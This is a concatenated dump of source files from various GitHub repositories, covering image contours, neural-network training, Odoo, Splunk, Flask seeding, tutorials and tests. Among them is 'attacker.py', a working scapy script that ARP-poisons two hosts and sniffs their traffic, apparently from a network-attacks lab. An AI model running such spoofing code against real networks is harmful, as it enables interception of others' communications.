__,contours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
print("there are " + str(len(contours)) + " contours")
#size
[h,w,_] = im.shape
im_final = np.zeros((h,w))
cnt = contours[0]
print("there are " + str(len(cnt)) + " points in contours[0]")
approx = cv2.approxPolyDP(cnt,30,True)
print("after approx, there are " + str(len(approx)) + " points")
print(approx)
cv2.drawContours(im,[approx],0,(255,0,0),-1)
contours.sort(key=len,reverse = True)
cnt = contours[0]
print("there are " + str(len(cnt)) + " points in contours[1]")
approx = cv2.approxPolyDP(cnt,50,True)
print("after approx, there are " + str(len(approx)) + " points")
print(approx)
cv2.drawContours(im,[approx],0,(0,255,0),-1)
cv2.drawContours(ntu,[approx],-1,(255,0,0),3)
cv2.drawContours(im_final,[approx],-1,(255,255,255),-1)
cv2.imwrite('contour.jpg',im)
cv2.imwrite('contour_ntu.jpg',ntu)
cv2.imwrite('final_building.jpg',im_final)
|
LeonChen66/UAV-and-TrueOrtho
|
Building Roof Contour/RDP.py
|
RDP.py
|
py
| 1,318 |
python
|
en
|
code
| 8 |
github-code
|
6
|
31838419123
|
import numpy as np
try:
import cPickle as pickle
except:
import pickle
from dataset.mnist import load_mnist
from SGD.TwoLayerNet import TwoLayerNet
(x_train, t_train), (x_test, t_test) = load_mnist\
(normalize=False,flatten=True,one_hot_label=True)
train_loss = []
'''Hyperparameters'''
iters_num = 1000
train_size = x_train.shape[0]
batch_size = 100
learning_rate = 0.1
network = TwoLayerNet(input_size = 784, hide_size = 50, output_size = 10)
for i in range(iters_num):
    # draw a random mini-batch
batch_mask = np.random.choice(train_size, batch_size)
x_batch = x_train[batch_mask]
t_batch = t_train[batch_mask]
    # compute the gradients
grad = network.numerical_gradient(x_batch, t_batch)
    # grad = network.gradient(x_batch, t_batch)  # faster backprop version!
    # update the parameters
for key in ('w1', 'b1', 'w2', 'b2'):
network.params[key] -= learning_rate * grad[key]
    # record the training loss
loss = network.loss(x_batch, t_batch)
train_loss.append(loss)
print(train_loss)
output = open('network_params.pkl','wb')
pickle.dump(network.params,output)
output.close()
|
maplect/CNN-APP
|
SGD/Neuralnet_train.py
|
Neuralnet_train.py
|
py
| 1,093 |
python
|
en
|
code
| 2 |
github-code
|
6
|
22357678211
|
# -*- coding: utf-8 -*-
from odoo import _, models, fields, api
class SelectPurchaseOrder(models.TransientModel):
_name = 'select.purchase.order'
purchaseorder_ids = fields.Many2many('purchase.order', string='Purchase Order')
@api.multi
def select_purchaseorders(self):
spp_id = self.env['spp'].browse(self._context.get('active_id', False))
if self.payment_type == 'BILL':
for order in self.purchaseorder_ids:
self.env['spp.line.bill'].create({
'purchaseorder_id': order.id,
'spp_id': spp_id.id
})
else:
for order in self.purchaseorder_ids:
self.env['spp.line'].create({
'purchaseorder_id': order.id,
'spp_id': spp_id.id
})
# spp_id._update_link_account_invoice(spp_id.id)
|
detian08/bsp_addons
|
account-payment-11.0/account_payment_spp/wizard/select_purchaseorder_wizard.py
|
select_purchaseorder_wizard.py
|
py
| 920 |
python
|
en
|
code
| 1 |
github-code
|
6
|
31449582311
|
import sys
import time
from multiprocessing import Process
from scapy.all import *
def arp_spoof(victim_ip, bystander_ip, attacker_mac):
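    # Repeatedly tell each host that the other's IP maps to the attacker's MAC (ARP cache poisoning).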
try:
while True:
send(ARP(op=2, pdst=victim_ip, psrc=bystander_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=attacker_mac), verbose=0)
send(ARP(op=2, pdst=bystander_ip, psrc=victim_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=attacker_mac), verbose=0)
time.sleep(1)
except KeyboardInterrupt:
sys.exit(0)
def packet_sniffer():
def sniff_callback(packet):
if packet.haslayer(IP):
print(f"Sniffed packet: {packet[IP].src} -> {packet[IP].dst}")
sniff(prn=sniff_callback, filter="ip", store=0)
def main():
victim_ip = "192.168.56.20"
bystander_ip = "192.168.56.30"
# Get the attacker's MAC address
attacker_mac = get_if_hwaddr(conf.iface)
# Start the ARP spoofing process
arp_spoof_process = Process(target=arp_spoof, args=(victim_ip, bystander_ip, attacker_mac))
arp_spoof_process.start()
# Start the packet sniffing process
packet_sniffer_process = Process(target=packet_sniffer)
packet_sniffer_process.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
arp_spoof_process.terminate()
packet_sniffer_process.terminate()
if __name__ == "__main__":
main()
|
emrberk/network-attacks
|
attacker/attacker.py
|
attacker.py
|
py
| 1,369 |
python
|
en
|
code
| 0 |
github-code
|
6
|
20210291556
|
import re
txt = "The rain in Spain"
x = re.search("^The.*Spain$", txt)
if x:
print("YES! We have a match!")
else:
print("No match")
x = re.findall("ai", txt)
print(x)
x = re.split(r"\s", txt)
print(x)
txt = "The rain in Spain"
x = re.split(r"\s", txt, 1)
print(x)
txt = "The rain in Spain"
x = re.sub(r"\s", "9", txt)
print(x)
txt = "The rain in Spain"
x = re.sub(r"\s", "9", txt, 2)
print(x)
txt = "The rain in Spain"
x = re.search("ai", txt)
print(x)
"""
.span() returns a tuple containing the start and end positions of the match.
.string returns the string passed into the function
.group() returns the part of the string where there was a match
"""
txt = "The rain in Spain Sos"
x = re.search(r"\bS\w+", txt)
print(x.span())
print(x.string)
print(x.group())
|
Nayassyl/22B050835
|
week5/w3schools/regex.py
|
regex.py
|
py
| 768 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27630602762
|
#!/usr/bin/env python3
import string
with open("game.py") as f:
game_str = f.read()
with open("style.css") as f:
style_str = f.read()
with open("index.html.template") as f:
template_str = f.read()
t = string.Template(template_str)
out_str = t.substitute(python_code=game_str, style_sheet=style_str)
with open("index.html", "w") as f:
f.write(out_str)
|
jthacker/memory_game
|
build.py
|
build.py
|
py
| 372 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43001373047
|
__author__ = "Vikram Anand"
__email__ = "[email protected]"
__license__ = "Apache 2.0"
__maintainer__ = "developer"
__status__ = "Production"
__version__ = "0.0.1"
import os
import logging
from google.cloud import bigquery, storage
logger = logging.getLogger('BigQuery')
class BigQuery:
"""Class Bigquery to connect and execute a query."""
def __init__(self, source_project = 'hmh-carenostics-dev', source_dataset = 'ckd_table'):
"""Class Bigquery to connect and execute a query."""
self.source_project = source_project
self.source_dataset = source_dataset
self.__initialize()
def __initialize(self):
self.client = bigquery.Client(project=self.source_project)
def query(self, query):
query_df = self.client.query(query).result().to_dataframe()
return query_df
|
RiptideStar/DataStack-main
|
hmhn/scripts/old-postgress/python-scripts/metrics/carenostics/big_query.py
|
big_query.py
|
py
| 814 |
python
|
en
|
code
| 0 |
github-code
|
6
|
35862756028
|
### DATA STRUCTURES
## 1) Creating lists;
liste = ["a", 19.3, 30]
liste_iki = [1, 2, 3, 4, 5]
tum_liste = [liste, liste_iki]
print(len(liste))
print(len(liste_iki))
print(liste[2])
print(liste_iki[3])
type(liste[2])  # type of a single element inside the list
print(tum_liste)
len(tum_liste)
print(tum_liste[1])
type(tum_liste[1])
print(tum_liste[1][2])  # to reach an element of the list nested inside the list!
# ADDING / CHANGING / REMOVING list elements
# Changing an element;
liste = ["anil", "rumeysa", "tilda"]
liste[2] = "defne"
print(liste)
liste = ["anil", "rumeysa", "tilda"]
liste[0:2] = "hakan", "melda"  # changes from index 0 up to 2, i.e. the 0th and 1st items change.
print(liste)
# Adding an element;
liste = ["anil", "rumeysa", "tilda"]
print(liste + ["defne"])  # for a permanent addition, assign the result back to a list.
liste = ["anil", "rumeysa", "tilda"]
liste = liste + ["defne"]
print(liste)
# Removing an element;
liste = ["anil", "rumeysa", "tilda", "defne"]
del liste[3]
print(liste)
# ADDING / REMOVING list elements with METHODS
# "append" method / adding;
liste = ["anil", "rumeysa", "tilda"]
liste.append("defne")
print(liste)
# "remove" method / removing;
liste = ["anil", "rumeysa", "tilda", "defne"]
liste.remove("defne")
print(liste)
# ADDING / REMOVING list elements by INDEX
# "insert" method;
liste = ["anil", "rumeysa", "tilda"]
liste.insert(1, "hakan")  # the change is not permanent; we inserted at index 1.
print(liste)
# to append at the very end of the list;
liste = ["anil", "rumeysa", "tilda"]
liste.insert(len(liste), "defne")
print(liste)
# "pop" method;
liste = ["anil", "hakan", " rumeysa", "tilda"]
liste.pop(1)
print(liste)
# Other list methods
# "count" / counting method;
liste = ["anil", "hakan", " rumeysa", "tilda"]
liste.count("hakan")
# "copy" / copying method (used to copy the existing list);
liste = ["anil", "rumeysa", "tilda"]
liste_yedek = liste.copy()
print(liste_yedek)
# "extend" method (used to join two lists);
liste = ["anil", "rumeysa", "tilda"]
liste.extend(["hakan", "melda", "defne"])
print(liste)
liste = ["anil", "rumeysa", "tilda"]
liste2 = ["hakan", "melda", "defne"]
liste.extend(liste2)
print(liste)
# "index" method (finds which index an element sits at);
liste = ["anil", "rumeysa", "tilda"]
liste.index("anil")
# "reverse" method (reverses the list);
liste = ["anil", "rumeysa", "tilda"]
liste.reverse()
print(liste)
liste = ["anil", "rumeysa", "tilda"]
liste2 = ["hakan", "melda", "defne"]
liste.extend(liste2)
liste.reverse()
print(liste)
# "sort" method (sorting numbers);
liste_sayilar = [16, 12, 2020]
liste_sayilar.sort()
print(liste_sayilar)
liste_sayilar = [3, 16, 5, 12, 7, 13, 650, 200, 2020]
liste_sayilar.sort()
print(liste_sayilar)
# "clear" / emptying method;
liste_sayilar = [16, 12, 2020]
liste_sayilar.clear()
print(liste_sayilar)
## 2) Creating tuples (tuples are "IMMUTABLE DATA STRUCTURES" and CANNOT BE MODIFIED.);
t = ("anil", "rumeysa", "tilda", 16, 12, 2020)
type(t)
t = ("anil")
type(t)  # with a single item, if the trailing comma is missing the type is treated as str.
t = ("anil",)
print(type(t))
# Accessing items;
t = ("anil", "rumeysa", "tilda", 16, 12, 2020)
print(t[4])  # NO MODIFICATION IS POSSIBLE!
## 3) Creating dictionaries (keys and values can each be either str or int.);
sozluk = {"REG": "Regrasyon Modeli",
          "LOJ": "Lojistik Regrasyon",
          "CART": "Classification and Reg."}
print(len(sozluk))
# values can also correspond to two or more items;
sozluk = {"REG": ["RMS", 10],
          "LOJ": ["MSE", 20],
          "CART": ["SSE", 30]}
print(len(sozluk))
# Accessing an element inside;
print(sozluk["REG"])
# Creating a dictionary inside a dictionary and accessing its elements;
sozluk = {"REG": {"RMSE": 10,
                  "MSE": 20,
                  "SSE": 30},
          "LOJ": {"RMSE": 10,
                  "MSE": 20,
                  "SSE": 30}}
print(sozluk["REG"]["SSE"])
# ADDING and CHANGING in a dictionary;
sozluk = {"REG": "Regrasyon Modeli",
          "LOJ": "Lojistik Regrasyon",
          "CART": "Classification and Reg."}
sozluk["GBM"] = "Gradient Boosting Mac."  # adding a new key together with its value
print(sozluk)
# To change a value, take an existing key and assign to it;
sozluk = {"REG": "Regrasyon Modeli",
          "LOJ": "Lojistik Regrasyon",
          "CART": "Classification and Reg."}
sozluk["REG"] = "Çoklu Doğrusal Regresyon"  # mind the "=" sign!
print(sozluk)
# Keys can only be built from immutable data structures;
# str, int, tuple (lists cannot be keys because they are not immutable; this restriction does not apply to values)
## 4) Creating SETs;
# Creating a set from a list;
liste = [1, "r", "rumeysa", 123]
print(set(liste))
# Creating a set from a tuple;
t = (1, "r", "rumeysa", 123,)
print(set(t))
# Uniqueness property;
rhsh = "rumeysa_her_seyi_halledecek."
print(set(rhsh))
s = set(rhsh)
print(len(rhsh))
print(len(s))
# Sets are unordered and do not support indexing.
# ADDING / REMOVING set elements;
rhsh = "rumeysa", "halledecek."
s = set(rhsh)
# "add" / adding method;
s.add("her seyi")
print(s)
# "remove" / removing method;
rhsh = "rumeysa", "her seyi", "halledecek"
s = set(rhsh)
s.remove("her seyi")
print(s)
s.remove(
    "her seyi")  # Raised a KeyError because we had already removed it; to avoid the error when unsure, do the removal with "discard".
print(s)
rhsh = "rumeysa", "her seyi", "halledecek"
s = set(rhsh)
s.remove("her seyi")
print(s)
s.discard("her seyi")  # Found nothing to remove, yet still raised no error!
print(s)
# DIFFERENCE OPERATIONS ON SETS
# Difference: difference() or "-"
# Intersection: intersection() or "&"
# Union: union()
# Elements not shared by both: symmetric_difference()
set1 = set([1, 3, 5])  # we built a set from a list.
set2 = set([1, 2, ])
print(set1 - set2)  # elements that are in set1 but not in set2
print(set1.difference(set2))
print(set2 - set1)  # elements that are in set2 but not in set1
print(set2.difference(set1))
print(set1 & set2)
print(set1.intersection(set2))  # not permanent unless you assign the result.
kesişim = set1.intersection(set2)
print(kesişim)
print(set1.union(set2))  # union
print(set2.union(set1))
union = set1.union(set2)  # each element is taken only once.
print(union)
# Updating set1 with the intersection;
set1 = set([1, 3, 5])
set2 = set([1, 2, 3])
set1.intersection_update(set2)
print(set1)
# Query operations on sets;
set1 = set([1, 3, 5])
set2 = set([1, 2, 3])
set1.isdisjoint(set2)  # is the intersection empty?
set1 = set([1, 3, 5])
set2 = set([1, 2, 3])
set1.issubset(set2)  # is set1 a subset of set2?
set1 = set([1, 3, 5])
set2 = set([1, 2, 3])
set1.issuperset(set2)  # does set1 contain set2?
# Lists: mutable, ordered, heterogeneous
# Tuples: immutable, ordered, heterogeneous
# Dictionaries: mutable, ordered, heterogeneous,
# Sets: mutable, unordered and unique, heterogeneous
|
Rumeysaislam/data-analysis-course
|
-4-Veri-Yapıları.py
|
-4-Veri-Yapıları.py
|
py
| 7,616 |
python
|
tr
|
code
| 0 |
github-code
|
6
|
27356830765
|
import random
import os
from helpers import *
from keras.models import model_from_json
# load json and create model
json_file = open('saved_models/model.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
# load weights into new model
model.load_weights("saved_models/CNN_model.h5")
path = '../DR_data/vins'
#file = random.choice(os.listdir(path))
file = '1AYEN45963S374568_Agane_light.ttf245.png'
# file = '6TNEF59347P425193_verdana.ttf225.png'
# Read the input image
im = cv2.imread(path + '/' + file)
cv2.imshow("Original Image with Rectangular ROIs {}".format(file), im)
cv2.waitKey()
'''
A VIN contains 17 characters
letters are capital
1 number
4 letters
5 numbers
1 letter
6 numbers
Perhaps we could train two models, one for digits and one for letters, but for now we won't do that
number_positions = [0, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16]
letters_positions = [1, 2, 3, 4, 10]
'''
vin = []
ROIs = detect_characters(im, path + '/' + file)
for roi in ROIs:
roi = np.expand_dims(roi, axis=0) # need this if I want to predict on a single image
prediction = model.predict(roi)
vin.append(prediction)
classes = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'J', 'K', 'L', 'M', 'N',
'P', 'R', 'S', 'T', 'V', 'W', 'X', 'Y']
vins = np.array(vin)
''.join([str(e) for e in vins])
print(vins)
vin_string = ''
for vin in vins:
for pred_list in vin:
for index, pred in enumerate(pred_list):
if int(pred) == 1:
predicted_value = classes[index]
vin_string += predicted_value
break
print(vin_string)
print(file[:17])
cv2.imshow("Resulting Image with Rectangular ROIs", im)
cv2.waitKey()
|
pekkipo/Characters_recognition
|
predict_characters.py
|
predict_characters.py
|
py
| 1,793 |
python
|
en
|
code
| 1 |
github-code
|
6
|
26305089118
|
#!/usr/bin/python3
"""Module containing the definition for a class of type square"""
Rectangle = __import__('9-rectangle').Rectangle
class Square(Rectangle):
"""Class representing a square"""
def __init__(self, size):
"""method to be called on instantiation"""
self.integer_validator("size", size)
super().__init__(size, size)
self.__size = size
|
AndyMSP/holbertonschool-higher_level_programming
|
0x0A-python-inheritance/10-square.py
|
10-square.py
|
py
| 390 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16119657095
|
__author__ = 'burgosz'
from django import template
register = template.Library()
from zabbix_reports.templatetags.zabbix_call import zbx_call
from django.core.cache import cache
@register.assignment_tag
def zbx_service_container_get():
services = []
return services
# Iterate over services and collect the service ids in order, together with their nesting depth.
def _zbx_service_ids_get_deep(topids, service_ids, level=0):
topidstostring = '["'+'","'.join(str(e) for e in topids)+'"]'
args = "{'parentids': "+topidstostring+", 'output': 'extend'}"
services = zbx_call('service.get', args)
services = sorted(services['result'], key=lambda srv: srv['name'])
for service in services:
service_ids.append({'id': str(service['serviceid']), 'level': str(level)})
pids = []
pids.append(int(service['serviceid']))
level += 1
_zbx_service_ids_get_deep(pids, service_ids, level)
level -= 1
return_value = '["'+'","'.join(str(e['id']) for e in service_ids)+'"]'
return return_value
@register.assignment_tag
def zbx_service_ids_get_deep(topids, service_ids, level=0):
# Cache the service ids
key = "deep_"+'["'+'","'.join(str(e) for e in topids)+'"]'
cached = cache.get(key)
if cached:
for cached_srv in cached:
service_ids.append(cached_srv)
return '["'+'","'.join(str(e['id']) for e in service_ids)+'"]'
else:
return_value = _zbx_service_ids_get_deep(topids, service_ids, level)
cache.set(key, service_ids, None)
return return_value
|
burgosz/zabbix_reports
|
templatetags/zabbix_services.py
|
zabbix_services.py
|
py
| 1,574 |
python
|
en
|
code
| 5 |
github-code
|
6
|
8257193173
|
import logging
from typing import Mapping
from datetime import datetime
import attr
from .dixel import Dixel
from ..utils import Pattern, DatetimeInterval, gateway
from ..utils.dicom import DicomLevel
# splunk-sdk is 2.7 only, so diana.utils.gateway provides a minimal query/put replacement
# Suppress insecure warning
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@attr.s
class Splunk(Pattern):
host = attr.ib( default="localhost" )
port = attr.ib( default="8000" )
user = attr.ib( default="splunk" )
protocol = attr.ib( default="http" )
password = attr.ib( default="admin" )
hec_protocol = attr.ib( default="http" )
hec_port = attr.ib( default="8088" )
gateway = attr.ib( init=False )
hec_tokens = attr.ib( factory=dict ) # Mapping of domain name -> token
default_token = attr.ib( default=None )
default_index = attr.ib( default='main' )
@gateway.default
def connect(self):
# Create a Service instance and log in
return gateway.Splunk(
host=self.host,
port=self.port,
protocol = self.protocol,
hec_port=self.hec_port,
hec_protocol=self.hec_protocol,
user=self.user,
password=self.password
)
def add_hec_token(self, name: str, token: str):
self.hec_tokens[name] = token
def find_items(self,
query: Mapping,
time_interval: DatetimeInterval=None):
results = self.gateway.find_events(query, time_interval)
# logging.debug("Splunk query: {}".format(query))
# logging.debug("Splunk results: {}".format(results))
if results:
worklist = set()
for d in results:
worklist.add( Dixel(meta=d, level=DicomLevel.of( d['level'] ) ) )
# logging.debug(worklist)
return worklist
def put(self, item: Dixel, host: str, token: str, index: str=None ):
logging.debug("Putting in Splunk")
if item.meta.get('InstanceCreationDateTime'):
timestamp = item.meta.get('InstanceCreationDateTime')
elif item.meta.get('StudyDateTime'):
timestamp = item.meta.get('StudyDateTime')
else:
logging.warning("Failed to get inline 'DateTime', using now()")
timestamp = datetime.now()
event = item.meta
event['level'] = str(item.level)
event['oid'] = item.oid()
if not token:
token=self.default_token
_token = self.hec_tokens.get(token)
if not index:
index=self.default_index
self.logger.debug(timestamp)
self.logger.debug(event)
self.logger.debug(index)
self.logger.debug(_token)
_host = "{}@{}".format(host, self.hostname)
# at $time $event was reported by $host for $index with credentials $auth
self.gateway.put_event( timestamp=timestamp, event=event, host=_host, index=index, token=_token )
# Real auth description
# headers = {'Authorization': 'Splunk {0}'.format(self.hec_tok[hec])}
|
derekmerck/DIANA
|
packages/diana/diana/apis/splunk.py
|
splunk.py
|
py
| 3,138 |
python
|
en
|
code
| 11 |
github-code
|
6
|
14153199843
|
from models import Pet,db,connect_db
from app import app
connect_db(app)
db.drop_all()
db.create_all()
pet1 = Pet(
name="Keeshond",
species="dog",
photo_url="http://cdn.akc.org/content/article-body-image/keeshond_dog_pictures.jpg",
age=2,
notes="I love this Dog")
pet2 = Pet(
name="Sherry",
species="dog",
photo_url="http://cdn.akc.org/content/article-body-image/newfoundland_dog_pictures.jpg",
age=3,
notes="Good Enough"
)
pet3 = Pet(
name = "Modena",
species = "dog",
photo_url = "http://cdn.akc.org/content/article-body-image/golden_puppy_dog_pictures.jpg",
age = 2
)
pet4 = Pet(
name = "Fiona",
species = "dog",
photo_url = "http://cdn.akc.org/content/article-body-image/great_pyr_puppy_dog_pictures_.jpg",
age = 1,
notes= "Hello,World"
)
pet5 = Pet(
name = "Andy",
species = "dog",
photo_url = "http://cdn.akc.org/content/article-body-image/Finnishlapphundpuppies_dog_pictures.jpg",
age = 1,
notes = "I'm Chihuahua"
)
db.session.add(pet1)
db.session.add(pet2)
db.session.add(pet3)
db.session.add(pet4)
db.session.add(pet5)
db.session.commit()
|
nickchow2020/Adoption-Agency
|
seed.py
|
seed.py
|
py
| 1,193 |
python
|
en
|
code
| 0 |
github-code
|
6
|
35473650215
|
from tensorflow.keras.models import load_model
from delta import calculate_gt
from loss import detection_loss, ssd_loss
import numpy as np
import pickle
from nms import non_maximum_suppression
from utils import images_with_rectangles, plot_images, xywh2xyxy, draw_rectangles
# load models
model = load_model('../models/best_model.h5', custom_objects={'ssd_loss': ssd_loss})
# load dataset
train_xs = np.load('../datasets/debug_true_images.npy')
train_ys = np.load('../datasets/debug_true_labels.npy')
trues_delta = xywh2xyxy(train_ys[..., :4])
trues_cls = train_ys[..., -1]
# load default_boxes
f = open('../datasets/default_boxes_bucket.pkl', 'rb')
default_boxes_bucket = pickle.load(f)
default_boxes = np.concatenate(default_boxes_bucket, axis=0)
# predictions with batch images
preds = model.predict(x=train_xs)
preds_onehot = preds[..., 4:] # shape=(N_img, N_anchor, n_classes)
preds_delta = preds[..., :4] # shape=(N_img, N_anchor, 4)
# change relative coords to absolute coords for predictions
gts_hat = calculate_gt(default_boxes, preds_delta) # shape=(N_img, N_anchor, 4)
# change relative coords to absolute coords for ground truths
gts = calculate_gt(default_boxes, trues_delta) # shape=(N_img, N_anchor, 4)
# get foreground(not background) bool mask for prediction, shape (N_img, N_default_boxes)
preds_cls = np.argmax(preds_onehot, axis=-1) # shape (N_img, N_default_boxes)
pos_preds_mask = (preds_cls != 10) # shape (N_img, N_default_boxes)
# get foreground bool mask for true, shape (N_img, N_default_boxes)
pos_trues_mask = (trues_cls != 10) # shape (N_img, N_default_boxes)
# collect the positive localization and classification info for each image
pos_preds_loc = []
pos_preds_cls = []
pos_preds_onehot = []
for pos_pred_mask, gt_hat, pred_cls, pred_onehot in zip(pos_preds_mask, gts_hat, preds_cls, preds_onehot):
pos_loc = gt_hat[pos_pred_mask]
pos_cls = pred_cls[pos_pred_mask]
pos_mask = pred_onehot[pos_pred_mask]
pos_preds_loc.append(pos_loc)
pos_preds_cls.append(pos_cls)
pos_preds_onehot.append(pos_mask)
# Non Maximum Suppression per image
nms_bboxes = []
for onehot_, loc_, cls_ in zip(pos_preds_onehot, pos_preds_loc, pos_preds_cls):
final_bboxes, _, _ = non_maximum_suppression(loc_, onehot_, 0.5)
final_bboxes = xywh2xyxy(np.array(final_bboxes))
nms_bboxes.append(final_bboxes)
# collect the positive localization and classification info for each image
pos_trues_loc = []
pos_trues_cls = []
for pos_pred_mask, gt, true_cls in zip(pos_trues_mask, gts, trues_cls):
pos_loc = gt[pos_pred_mask]
pos_cls = true_cls[pos_pred_mask]
pos_loc = xywh2xyxy(pos_loc)
pos_trues_loc.append(pos_loc)
pos_trues_cls.append(pos_cls)
# visualization prediction
rected_images = images_with_rectangles(train_xs * 255, pos_trues_loc, color=(0, 255, 0))
plot_images(rected_images)
rected_images = images_with_rectangles(train_xs * 255, nms_bboxes, color=(255, 255, 0))
plot_images(rected_images)
|
taila0/single-shot-multibox-detector
|
src/main_eval.py
|
main_eval.py
|
py
| 3,001 |
python
|
en
|
code
| 0 |
github-code
|
6
|
25755944520
|
import unittest
from datetime import date, datetime
from constants import (
STATUS_IN_PROGRESS,
STATUS_COMPLETED,
TASK_UPDATED,
PRIORITY_HIGH,
PRIORITY_MEDIUM,
PRIORITY_LOW,
TASK1,
TASK2,
TASK3
)
from main import app, bd
from models.task_model import Task
from repository.task_repository import TaskRepository
from service.task_service import get_all_tasks, create_task, update_task, delete_task
class TaskServiceTestCase(unittest.TestCase):
def setUp(self):
app.testing = True
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'
self.app_context = app.app_context()
self.app_context.push()
bd.create_all()
self.client = app.test_client()
self.repository = TaskRepository()
def tearDown(self):
bd.session.remove()
bd.drop_all()
def test_get_all_tasks(self):
task1 = Task(
name=TASK1,
priority=PRIORITY_HIGH,
start_date=date.today(),
planned_end_date=date.today(),
actual_end_date=None,
status=STATUS_IN_PROGRESS,
project_id='1'
)
task2 = Task(
name=TASK2,
priority=PRIORITY_MEDIUM,
start_date=date.today(),
planned_end_date=date.today(),
actual_end_date=None,
status=STATUS_IN_PROGRESS,
project_id='2'
)
task3 = Task(
name=TASK3,
priority=PRIORITY_LOW,
start_date=date.today(),
planned_end_date=date.today(),
actual_end_date=None,
status=STATUS_IN_PROGRESS,
project_id='3'
)
self.repository.create(task1)
self.repository.create(task2)
self.repository.create(task3)
tasks_project1 = get_all_tasks(task1.project_id)
tasks_project2 = get_all_tasks(task2.project_id)
tasks_project3 = get_all_tasks(task3.project_id)
self.assertEqual(len(tasks_project1), 1)
self.assertEqual(tasks_project1[0]['name'], TASK1)
self.assertEqual(tasks_project1[0]['priority'], PRIORITY_HIGH)
self.assertEqual(tasks_project1[0]['start_date'], date.today().strftime('%Y-%m-%d'))
self.assertEqual(tasks_project1[0]['planned_end_date'], date.today().strftime('%Y-%m-%d'))
self.assertIsNone(tasks_project1[0]['actual_end_date'])
self.assertEqual(tasks_project1[0]['status'], STATUS_IN_PROGRESS)
self.assertEqual(len(tasks_project2), 1)
self.assertEqual(tasks_project2[0]['name'], TASK2)
self.assertEqual(tasks_project2[0]['priority'], PRIORITY_MEDIUM)
self.assertEqual(tasks_project2[0]['start_date'], date.today().strftime('%Y-%m-%d'))
self.assertEqual(tasks_project2[0]['planned_end_date'], date.today().strftime('%Y-%m-%d'))
self.assertIsNone(tasks_project2[0]['actual_end_date'])
self.assertEqual(tasks_project2[0]['status'], STATUS_IN_PROGRESS)
self.assertEqual(len(tasks_project3), 1)
self.assertEqual(tasks_project3[0]['name'], TASK3)
self.assertEqual(tasks_project3[0]['priority'], PRIORITY_LOW)
self.assertEqual(tasks_project3[0]['start_date'], date.today().strftime('%Y-%m-%d'))
self.assertEqual(tasks_project3[0]['planned_end_date'], date.today().strftime('%Y-%m-%d'))
self.assertIsNone(tasks_project3[0]['actual_end_date'])
self.assertEqual(tasks_project3[0]['status'], STATUS_IN_PROGRESS)
def test_create_task(self):
project_id = 1
data = {
'name': 'New Task',
'priority': 'High',
'status': 'In Progress',
'planned_end_date': '2023-07-20'
}
create_task(project_id, data)
task = self.repository.get_all()[0]
self.assertIsNotNone(task.id)
self.assertEqual(task.name, 'New Task')
self.assertEqual(task.priority, 'High')
self.assertEqual(task.start_date, date.today())
self.assertEqual(task.planned_end_date, datetime.strptime(data['planned_end_date'], '%Y-%m-%d').date())
self.assertIsNone(task.actual_end_date)
self.assertEqual(task.status, 'In Progress')
self.assertEqual(task.project_id, 1)
def test_update_task(self):
task = Task(
name=TASK1,
priority=PRIORITY_HIGH,
start_date=date.today(),
planned_end_date=date.today(),
actual_end_date=None,
status=STATUS_IN_PROGRESS
)
self.repository.create(task)
data = {
'name': TASK_UPDATED,
'priority': PRIORITY_MEDIUM,
'status': STATUS_COMPLETED
}
update_task(task.id, data)
updated_task = self.repository.get_by_id(task.id)
self.assertEqual(updated_task.name, TASK_UPDATED)
self.assertEqual(updated_task.priority, PRIORITY_MEDIUM)
self.assertEqual(updated_task.status, STATUS_COMPLETED)
def test_delete_task(self):
task_data = {
'name': TASK1,
'priority': PRIORITY_HIGH,
'start_date': date.today(),
'planned_end_date': date.today(),
'actual_end_date': None,
'status': STATUS_IN_PROGRESS
}
task = Task(**task_data)
self.repository.create(task)
task_id = task.id
delete_task(task_id)
deleted_task = self.repository.get_by_id(task_id)
self.assertIsNone(deleted_task)
# def setUp(self):
# app.testing = True
# app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'
# self.app_context = app.app_context()
# self.app_context.push()
# bd.create_all()
# self.client = app.test_client()
# self.repository = TaskRepository()
#
# def tearDown(self):
# bd.session.remove()
# bd.drop_all()
if __name__ == '__main__':
unittest.main()
|
dan9Protasenia/task-management
|
tests/test_task_service.py
|
test_task_service.py
|
py
| 5,950 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73871407226
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 27 20:09:14 2020
@author: scro3517
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
c1 = 1 #b/c single time-series
c2 = 4 #4
c3 = 16 #4
c4 = 32 #4
k=7 #kernel size
s=3 #stride
#num_classes = 3
class cnn_network_time(nn.Module):
""" CNN Implemented in Original Paper - Supposedly Simple but Powerful """
def __init__(self,dropout_type,p1,p2,p3,classification,heads='single'):
super(cnn_network_time,self).__init__()
if classification is not None and classification != '2-way':
num_classes = int(classification.split('-')[0])
elif classification == '2-way':
num_classes = 1
embedding_dim = 100 #100
#self.conv1 = nn.Conv2d(c1,c2,k,s)
self.conv1 = nn.Conv1d(c1,c2,k,s)
self.batchnorm1 = nn.BatchNorm1d(c2)
#self.conv2 = nn.Conv2d(c2,c3,k,s)
self.conv2 = nn.Conv1d(c2,c3,k,s)
self.batchnorm2 = nn.BatchNorm1d(c3)
#self.conv3 = nn.Conv2d(c3,c4,k,s)
self.conv3 = nn.Conv1d(c3,c4,k,s)
self.batchnorm3 = nn.BatchNorm1d(c4)
self.linear1 = nn.Linear(c4*10,embedding_dim)
self.linear2 = nn.Linear(embedding_dim,num_classes)
self.oracle_head = nn.Linear(embedding_dim,1) #I may have to comment out when performing inference for ALPS
self.heads = heads
self.relu = nn.ReLU()
self.selu = nn.SELU()
self.maxpool = nn.MaxPool1d(2)
